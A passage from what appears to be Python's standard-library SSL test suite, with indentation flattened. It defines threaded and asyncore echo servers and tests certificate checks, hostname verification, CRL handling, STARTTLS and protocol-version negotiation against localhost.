self.server.selected_alpn_protocols.append(self.sslconn.selected_alpn_protocol())
except (ssl.SSLError, ConnectionResetError) as e:
# We treat ConnectionResetError as though it were an
# SSLError - OpenSSL on Ubuntu abruptly closes the
# connection when asked to use an unsupported protocol.
#
# XXX Various errors can have happened here, for example
# a mismatching protocol version, an invalid certificate,
# or a low-level bug. This should be made more discriminating.
self.server.conn_errors.append(e)
if self.server.chatty:
handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
self.running = False
self.server.stop()
self.close()
return False
else:
self.server.shared_ciphers.append(self.sslconn.shared_ciphers())
if self.server.context.verify_mode == ssl.CERT_REQUIRED:
cert = self.sslconn.getpeercert()
if support.verbose and self.server.chatty:
sys.stdout.write(" client cert is " + pprint.pformat(cert) + "\n")
cert_binary = self.sslconn.getpeercert(True)
if support.verbose and self.server.chatty:
sys.stdout.write(" cert binary is " + str(len(cert_binary)) + " bytes\n")
cipher = self.sslconn.cipher()
if support.verbose and self.server.chatty:
sys.stdout.write(" server: connection cipher is now " + str(cipher) + "\n")
sys.stdout.write(" server: selected protocol is now "
+ str(self.sslconn.selected_npn_protocol()) + "\n")
return True
def read(self):
if self.sslconn:
return self.sslconn.read()
else:
return self.sock.recv(1024)
def write(self, bytes):
if self.sslconn:
return self.sslconn.write(bytes)
else:
return self.sock.send(bytes)
def close(self):
if self.sslconn:
self.sslconn.close()
else:
self.sock.close()
def run(self):
self.running = True
if not self.server.starttls_server:
if not self.wrap_conn():
return
while self.running:
try:
msg = self.read()
stripped = msg.strip()
if not stripped:
# eof, so quit this handler
self.running = False
try:
self.sock = self.sslconn.unwrap()
except OSError:
# Many tests shut the TCP connection down
# without an SSL shutdown. This causes
# unwrap() to raise OSError with errno=0!
pass
else:
self.sslconn = None
self.close()
elif stripped == b'over':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: client closed connection\n")
self.close()
return
elif (self.server.starttls_server and
stripped == b'STARTTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read STARTTLS from client, sending OK...\n")
self.write(b"OK\n")
if not self.wrap_conn():
return
elif (self.server.starttls_server and self.sslconn
and stripped == b'ENDTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read ENDTLS from client, sending OK...\n")
self.write(b"OK\n")
self.sock = self.sslconn.unwrap()
self.sslconn = None
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: connection is now unencrypted...\n")
elif stripped == b'CB tls-unique':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read CB tls-unique from client, sending our CB data...\n")
data = self.sslconn.get_channel_binding("tls-unique")
self.write(repr(data).encode("us-ascii") + b"\n")
else:
if (support.verbose and
self.server.connectionchatty):
ctype = (self.sslconn and "encrypted") or "unencrypted"
sys.stdout.write(" server: read %r (%s), sending back %r (%s)...\n"
% (msg, ctype, msg.lower(), ctype))
self.write(msg.lower())
except OSError:
if self.server.chatty:
handle_error("Test server failure:\n")
self.close()
self.running = False
# normally, we'd just stop here, but for the test
# harness, we want to stop the server
self.server.stop()
def __init__(self, certificate=None, ssl_version=None,
certreqs=None, cacerts=None,
chatty=True, connectionchatty=False, starttls_server=False,
npn_protocols=None, alpn_protocols=None,
ciphers=None, context=None):
if context:
self.context = context
else:
self.context = ssl.SSLContext(ssl_version
if ssl_version is not None
else ssl.PROTOCOL_TLSv1)
self.context.verify_mode = (certreqs if certreqs is not None
else ssl.CERT_NONE)
if cacerts:
self.context.load_verify_locations(cacerts)
if certificate:
self.context.load_cert_chain(certificate)
if npn_protocols:
self.context.set_npn_protocols(npn_protocols)
if alpn_protocols:
self.context.set_alpn_protocols(alpn_protocols)
if ciphers:
self.context.set_ciphers(ciphers)
self.chatty = chatty
self.connectionchatty = connectionchatty
self.starttls_server = starttls_server
self.sock = socket.socket()
self.port = support.bind_port(self.sock)
self.flag = None
self.active = False
self.selected_npn_protocols = []
self.selected_alpn_protocols = []
self.shared_ciphers = []
self.conn_errors = []
threading.Thread.__init__(self)
self.daemon = True
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
self.stop()
self.join()
def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.sock.settimeout(0.05)
self.sock.listen()
self.active = True
if self.flag:
# signal an event
self.flag.set()
while self.active:
try:
newconn, connaddr = self.sock.accept()
if support.verbose and self.chatty:
sys.stdout.write(' server: new connection from '
+ repr(connaddr) + '\n')
handler = self.ConnectionHandler(self, newconn, connaddr)
handler.start()
handler.join()
except socket.timeout:
pass
except KeyboardInterrupt:
self.stop()
self.sock.close()
def stop(self):
self.active = False
class AsyncoreEchoServer(threading.Thread):
# this one's based on asyncore.dispatcher
class EchoServer (asyncore.dispatcher):
class ConnectionHandler (asyncore.dispatcher_with_send):
def __init__(self, conn, certfile):
self.socket = ssl.wrap_socket(conn, server_side=True,
certfile=certfile,
do_handshake_on_connect=False)
asyncore.dispatcher_with_send.__init__(self, self.socket)
self._ssl_accepting = True
self._do_ssl_handshake()
def readable(self):
if isinstance(self.socket, ssl.SSLSocket):
while self.socket.pending() > 0:
self.handle_read_event()
return True
def _do_ssl_handshake(self):
try:
self.socket.do_handshake()
except (ssl.SSLWantReadError, ssl.SSLWantWriteError):
return
except ssl.SSLEOFError:
return self.handle_close()
except ssl.SSLError:
raise
except OSError as err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self._ssl_accepting = False
def handle_read(self):
if self._ssl_accepting:
self._do_ssl_handshake()
else:
data = self.recv(1024)
if support.verbose:
sys.stdout.write(" server: read %s from client\n" % repr(data))
if not data:
self.close()
else:
self.send(data.lower())
def handle_close(self):
self.close()
if support.verbose:
sys.stdout.write(" server: closed connection %s\n" % self.socket)
def handle_error(self):
raise
def __init__(self, certfile):
self.certfile = certfile
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = support.bind_port(sock, '')
asyncore.dispatcher.__init__(self, sock)
self.listen(5)
def handle_accepted(self, sock_obj, addr):
if support.verbose:
sys.stdout.write(" server: new connection from %s:%s\n" %addr)
self.ConnectionHandler(sock_obj, self.certfile)
def handle_error(self):
raise
def __init__(self, certfile):
self.flag = None
self.active = False
self.server = self.EchoServer(certfile)
self.port = self.server.port
threading.Thread.__init__(self)
self.daemon = True
def __str__(self):
return "<%s %s>" % (self.__class__.__name__, self.server)
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
if support.verbose:
sys.stdout.write(" cleanup: stopping server.\n")
self.stop()
if support.verbose:
sys.stdout.write(" cleanup: joining server thread.\n")
self.join()
if support.verbose:
sys.stdout.write(" cleanup: successfully joined.\n")
def start (self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.active = True
if self.flag:
self.flag.set()
while self.active:
try:
asyncore.loop(1)
except:
pass
def stop(self):
self.active = False
self.server.close()
def server_params_test(client_context, server_context, indata=b"FOO\n",
chatty=True, connectionchatty=False, sni_name=None):
"""
Launch a server, connect a client to it and try various reads
and writes.
"""
stats = {}
server = ThreadedEchoServer(context=server_context,
chatty=chatty,
connectionchatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=sni_name) as s:
s.connect((HOST, server.port))
for arg in [indata, bytearray(indata), memoryview(indata)]:
if connectionchatty:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(arg)
outdata = s.read()
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
raise AssertionError(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
stats.update({
'compression': s.compression(),
'cipher': s.cipher(),
'peercert': s.getpeercert(),
'client_alpn_protocol': s.selected_alpn_protocol(),
'client_npn_protocol': s.selected_npn_protocol(),
'version': s.version(),
})
s.close()
stats['server_alpn_protocols'] = server.selected_alpn_protocols
stats['server_npn_protocols'] = server.selected_npn_protocols
stats['server_shared_ciphers'] = server.shared_ciphers
return stats
def try_protocol_combo(server_protocol, client_protocol, expect_success,
certsreqs=None, server_options=0, client_options=0):
"""
Try to SSL-connect using *client_protocol* to *server_protocol*.
If *expect_success* is true, assert that the connection succeeds,
if it's false, assert that the connection fails.
Also, if *expect_success* is a string, assert that it is the protocol
version actually used by the connection.
"""
if certsreqs is None:
certsreqs = ssl.CERT_NONE
certtype = {
ssl.CERT_NONE: "CERT_NONE",
ssl.CERT_OPTIONAL: "CERT_OPTIONAL",
ssl.CERT_REQUIRED: "CERT_REQUIRED",
}[certsreqs]
if support.verbose:
formatstr = (expect_success and " %s->%s %s\n") or " {%s->%s} %s\n"
sys.stdout.write(formatstr %
(ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol),
certtype))
client_context = ssl.SSLContext(client_protocol)
client_context.options |= client_options
server_context = ssl.SSLContext(server_protocol)
server_context.options |= server_options
# NOTE: we must enable "ALL" ciphers on the client, otherwise an
# SSLv23 client will send an SSLv3 hello (rather than SSLv2)
# starting from OpenSSL 1.0.0 (see issue #8322).
if client_context.protocol == ssl.PROTOCOL_SSLv23:
client_context.set_ciphers("ALL")
for ctx in (client_context, server_context):
ctx.verify_mode = certsreqs
ctx.load_cert_chain(CERTFILE)
ctx.load_verify_locations(CERTFILE)
try:
stats = server_params_test(client_context, server_context,
chatty=False, connectionchatty=False)
# Protocol mismatch can result in either an SSLError, or a
# "Connection reset by peer" error.
except ssl.SSLError:
if expect_success:
raise
except OSError as e:
if expect_success or e.errno != errno.ECONNRESET:
raise
else:
if not expect_success:
raise AssertionError(
"Client protocol %s succeeded with server protocol %s!"
% (ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol)))
elif (expect_success is not True
and expect_success != stats['version']):
raise AssertionError("version mismatch: expected %r, got %r"
% (expect_success, stats['version']))
class ThreadedTests(unittest.TestCase):
@skip_if_broken_ubuntu_ssl
def test_echo(self):
"""Basic test of an SSL client connecting to a server"""
if support.verbose:
sys.stdout.write("\n")
for protocol in PROTOCOLS:
with self.subTest(protocol=ssl._PROTOCOL_NAMES[protocol]):
context = ssl.SSLContext(protocol)
context.load_cert_chain(CERTFILE)
server_params_test(context, context,
chatty=True, connectionchatty=True)
def test_getpeercert(self):
if support.verbose:
sys.stdout.write("\n")
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
s = context.wrap_socket(socket.socket(),
do_handshake_on_connect=False)
s.connect((HOST, server.port))
# getpeercert() raise ValueError while the handshake isn't
# done.
with self.assertRaises(ValueError):
s.getpeercert()
s.do_handshake()
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()
if support.verbose:
sys.stdout.write(pprint.pformat(cert) + '\n')
sys.stdout.write("Connection cipher is " + str(cipher) + '.\n')
if 'subject' not in cert:
self.fail("No subject field in certificate: %s." %
pprint.pformat(cert))
if ((('organizationName', 'Python Software Foundation'),)
not in cert['subject']):
self.fail(
"Missing or invalid 'organizationName' field in certificate subject; "
"should be 'Python Software Foundation'.")
self.assertIn('notBefore', cert)
self.assertIn('notAfter', cert)
before = ssl.cert_time_to_seconds(cert['notBefore'])
after = ssl.cert_time_to_seconds(cert['notAfter'])
self.assertLess(before, after)
s.close()
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_crl_check(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(SIGNING_CA)
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(context.verify_flags, ssl.VERIFY_DEFAULT | tf)
# VERIFY_DEFAULT should pass
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# VERIFY_CRL_CHECK_LEAF without a loaded CRL file fails
context.verify_flags |= ssl.VERIFY_CRL_CHECK_LEAF
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket()) as s:
with self.assertRaisesRegex(ssl.SSLError,
"certificate verify failed"):
s.connect((HOST, server.port))
# now load a CRL file. The CRL file is signed by the CA.
context.load_verify_locations(CRLFILE)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
def test_check_hostname(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.verify_mode = ssl.CERT_REQUIRED
context.check_hostname = True
context.load_verify_locations(SIGNING_CA)
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname="localhost") as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# incorrect hostname should raise an exception
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname="invalid") as s:
with self.assertRaisesRegex(ssl.CertificateError,
"hostname 'invalid' doesn't match 'localhost'"):
s.connect((HOST, server.port))
# missing server_hostname arg should cause an exception, too
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with socket.socket() as s:
with self.assertRaisesRegex(ValueError,
"check_hostname requires server_hostname"):
context.wrap_socket(s)
def test_wrong_cert(self):
"""Connecting when the server rejects the client's certificate
Launch a server with CERT_REQUIRED, and check that trying to
connect to it with a wrong client certificate fails.
"""
certfile = os.path.join(os.path.dirname(__file__) or os.curdir,
"wrongcert.pem")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_REQUIRED,
cacerts=CERTFILE, chatty=False,
connectionchatty=False)
with server, \
socket.socket() as sock, \
ssl.wrap_socket(sock,
certfile=certfile,
ssl_version=ssl.PROTOCOL_TLSv1) as s:
try:
# Expect either an SSL error about the server rejecting
# the connection, or a low-level connection reset (which
# sometimes happens on Windows)
s.connect((HOST, server.port))
except ssl.SSLError as e:
if support.verbose:
sys.stdout.write("\nSSLError is %r\n" % e)
except OSError as e:
if e.errno != errno.ECONNRESET:
raise
if support.verbose:
sys.stdout.write("\nsocket.error is %r\n" % e)
else:
self.fail("Use of invalid cert should have failed!")
def test_rude_shutdown(self):
"""A brutal shutdown of an SSL server should raise an OSError
in the client when attempting handshake.
"""
listener_ready = threading.Event()
listener_gone = threading.Event()
s = socket.socket()
port = support.bind_port(s, HOST)
# `listener` runs in a thread. It sits in an accept() until
# the main thread connects. Then it rudely closes the socket,
# and sets Event `listener_gone` to let the main thread know
# the socket is gone.
def listener():
s.listen()
listener_ready.set()
newsock, addr = s.accept()
newsock.close()
s.close()
listener_gone.set()
def connector():
listener_ready.wait()
with socket.socket() as c:
c.connect((HOST, port))
listener_gone.wait()
try:
ssl_sock = ssl.wrap_socket(c)
except OSError:
pass
else:
self.fail('connecting to closed SSL socket should have failed')
t = threading.Thread(target=listener)
t.start()
try:
connector()
finally:
t.join()
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv2'),
"OpenSSL is compiled without SSLv2 support")
def test_protocol_sslv2(self):
"""Connecting to an SSLv2 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLSv1, False)
# SSLv23 client with specific SSL options
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_SSLv2)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
def test_protocol_sslv23(self):
"""Connecting to an SSLv23 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try:
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv2, True)
except OSError as x:
# this fails on some older versions of OpenSSL (0.9.7l, for instance)
if support.verbose:
sys.stdout.write(
" SSL2 client to SSL23 server test unexpectedly failed:\n %s\n"
% str(x))
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1')
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
# Server with specific SSL options
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False,
server_options=ssl.OP_NO_SSLv3)
# Will choose TLSv1
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True,
server_options=ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, False,
server_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv3'),
"OpenSSL is compiled without SSLv3 support")
def test_protocol_sslv3(self):
"""Connecting to an SSLv3 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3')
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv2, False)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLSv1, False)
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv23,
False, client_options=ssl.OP_NO_SSLv2)
@skip_if_broken_ubuntu_ssl
def test_protocol_tlsv1(self):
"""Connecting to a TLSv1 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1')
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_1"),
"TLS version 1.1 not supported.")
def test_protocol_tlsv1_1(self):
"""Connecting to a TLSv1.1 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1_1)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_1, False)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_2"),
"TLS version 1.2 not supported.")
def test_protocol_tlsv1_2(self):
"""Connecting to a TLSv1.2 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2',
server_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,
client_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1_2)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2')
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_2, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_2, False)
def test_starttls(self):
"""Switching from clear text to encrypted and back again."""
msgs = (b"msg 1", b"MSG 2", b"STARTTLS", b"MSG 3", b"msg 4", b"ENDTLS", b"msg 5", b"msg 6")
server = ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLSv1,
starttls_server=True,
chatty=True,
connectionchatty=True)
wrapped = False
with server:
s = socket.socket()
s.setblocking(1)
s.connect((HOST, server.port))
if support.verbose:
sys.stdout.write("\n")
for indata in msgs:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
if wrapped:
conn.write(indata)
outdata = conn.read()
else:
s.send(indata)
outdata = s.recv(1024)
msg = outdata.strip().lower()
if indata == b"STARTTLS" and msg.startswith(b"ok"):
# STARTTLS ok, switch to secure mode
if support.verbose:
sys.stdout.write(
" client: read %r from server, starting TLS...\n"
% msg)
conn = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)
wrapped = True
elif indata == b"ENDTLS" and msg.startswith(b"ok"):
# ENDTLS ok, switch back to clear text
if support.verbose:
sys.stdout.write(
" client: read %r from server, ending TLS...\n"
% msg)
s = conn.unwrap()
wrapped = False
else:
if support.verbose:
sys.stdout.write(
" client: read %r from server\n" % msg)
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
if wrapped:
conn.write(b"over\n")
else:
s.send(b"over\n")
if wrapped:
conn.close()
else:
s.close()
def test_socketserver(self):
"""Using a SocketServer to create and manage SSL connections."""
server = make_https_server(self, certfile=CERTFILE)
# try to connect
if support.verbose:
sys.stdout.write('\n')
with open(CERTFILE, 'rb') as f:
d1 = f.read()
d2 = ''
# now fetch the same data from the HTTPS server
url = 'https://localhost:%d/%s' % (
server.port, os.path.split(CERTFILE)[1])
context = ssl.create_default_context(cafile=CERTFILE)
f = urllib.request.urlopen(url, context=context)
try:
dlen = f.info().get("content-length")
if dlen and (int(dlen) > 0):
d2 = f.read(int(dlen))
if support.verbose:
sys.stdout.write(
" client: read %d bytes from remote server '%s'\n"
% (len(d2), server))
finally:
f.close()
self.assertEqual(d1, d2)
def test_asyncore_server(self):
"""Check the example asyncore integration."""
indata = "TEST MESSAGE of mixed case\n"
if support.verbose:
sys.stdout.write("\n")
indata = b"FOO\n"
server = AsyncoreEchoServer(CERTFILE)
with server:
s = ssl.wrap_socket(socket.socket())
s.connect(('127.0.0.1', server.port))
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(indata)
outdata = s.read()
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
self.fail(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
s.close()
if support.verbose:
sys.stdout.write(" client: connection closed.\n")
def test_recv_send(self):
"""Test recv(), send() and friends."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = ssl.wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
# helper methods for standardising recv* method signatures
def _recv_into():
b = bytearray(b"\0"*100)
count = s.recv_into(b)
return b[:count]
def _recvfrom_into():
b = bytearray(b"\0"*100)
count, addr = s.recvfrom_into(b)
return b[:count]
# (name, method, expect success?, *args, return value func)
send_methods = [
('send', s.send, True, [], len),
('sendto', s.sendto, False, ["some.address"], len),
('sendall', s.sendall, True, [], lambda x: None),
]
# (name, method, whether to expect success, *args)
recv_methods = [
('recv', s.recv, True, []),
('recvfrom', s.recvfrom, False, ["some.address"]),
('recv_into', _recv_into, True, []),
('recvfrom_into', _recvfrom_into, False, []),
]
data_prefix = "PREFIX_"
for (meth_name, send_meth, expect_success, args,
ret_val_meth) in send_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
ret = send_meth(indata, *args)
msg = "sending with {}".format(meth_name)
self.assertEqual(ret, ret_val_meth(indata), msg=msg)
outdata = s.read()
if outdata != indata.lower():
self.fail(
"While sending with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to send with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
for meth_name, recv_meth, expect_success, args in recv_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
s.send(indata)
outdata = recv_meth(*args)
if outdata != indata.lower():
self.fail(
"While receiving with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to receive with method <<{name:s}>>; "
